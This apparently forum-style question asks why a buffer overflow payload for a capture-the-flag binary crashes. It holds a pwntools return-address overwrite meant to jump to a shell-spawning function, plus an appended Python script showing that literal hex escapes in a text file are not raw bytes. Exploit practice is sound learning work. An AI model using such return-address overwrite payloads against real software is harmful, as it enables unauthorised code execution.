Understanding why this buffer overflow attack isn’t working


I’m doing a buffer overflow challenge, and I can’t understand what exactly I’m doing wrong. Through debugging, I managed to figure out what my input should look like such that I can force the program to return to a function. From gdb I figured that if I entered “aaaaaaaaaaaaaaaaaaaaaaaaaaaacdefbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb” I can get the program to return to cdef, i.e. 0x66656463. Here’s a screenshot just in case. As you can see, the program managed to go to 0x66656463. Now I found the function’s address through gdb and I tried placing it in cdef’s spot in little-endian order using pwntools:

    payload = "a" * 28 + "\x56\x85\x04\x08" + "b" * 47
    msg = "-1\n" + payload
    io.sendline(msg)

The reason for the “-1\n” is that the program asks for input twice: the first time I just enter -1, and on the second input I try the exploit. So far, I’m just getting a segfault, and the address I want to jump to should be starting a shell for me to exploit. I’m not sure what exactly I’m doing wrong, and any help would be appreciated. If I had to guess, it’s that I’m somehow dealing with the two inputs incorrectly (they’re being read via fgets() in C, if that matters).

EDIT: I have the source binary and I tried running it locally. I created the following txt file:

    -1
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaV\x85\x04\x08bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

and I redirect it in gdb via:

    run < <(cat input.txt)

This works the same, but whenever I add an escaped hex in place of the cdef, I get a different segfault at a different address (see screenshot).

It looks like if I replace any of the cdef with an escaped hex, I get a segfault at 0x08048726. Is something wrong with passing in the bytes?
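Added example, not code from the question: it packs the address the way pwntools' `p32()` does and compares that with what a text file containing literal `\x85`-style escapes actually delivers when redirected into the program. `PAD_BEFORE`/`PAD_AFTER` follow the 28/47 split from the question, and the only assumption is that the shell redirect passes the file's bytes through unchanged (no escape processing).

```python
import struct

# Return address from the question (0x08048556, written as
# "\x56\x85\x04\x08" in the pwntools payload).
TARGET_ADDR = 0x08048556
PAD_BEFORE = 28   # bytes before the saved return address, per the question
PAD_AFTER = 47    # trailing filler, per the question


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian, like pwntools' p32()."""
    return struct.pack("<I", value)


def payload_from_python() -> bytes:
    """Second input line as a Python script builds it: real bytes."""
    return b"a" * PAD_BEFORE + p32(TARGET_ADDR) + b"b" * PAD_AFTER


def payload_from_text_file() -> bytes:
    """What the program reads from input.txt: a text editor stores the
    backslash escapes as literal characters ('\\', 'x', '8', '5', ...),
    so the 4-byte address becomes 13 characters and everything shifts."""
    line = "a" * PAD_BEFORE + r"V\x85\x04\x08" + "b" * PAD_AFTER
    return line.encode("ascii")


def return_address_slot(payload: bytes) -> bytes:
    """The four bytes that land on the saved return address."""
    return payload[PAD_BEFORE:PAD_BEFORE + 4]


def overwritten_eip(payload: bytes) -> int:
    """Interpret that slot the way the CPU will on return (little-endian)."""
    return struct.unpack("<I", return_address_slot(payload))[0]


if __name__ == "__main__":
    print(hex(overwritten_eip(payload_from_python())))     # intended address
    print(return_address_slot(payload_from_text_file()))   # literal 'V\x8'
    print(hex(overwritten_eip(payload_from_text_file())))  # not the intended address
```

Comparing the two `overwritten_eip()` results shows why the file-based run faults somewhere else: the saved return address is overwritten with the ASCII of the escape text, not with the packed address. To feed raw bytes through a file, the file itself has to contain the bytes (for example written by a script), not the escape sequences.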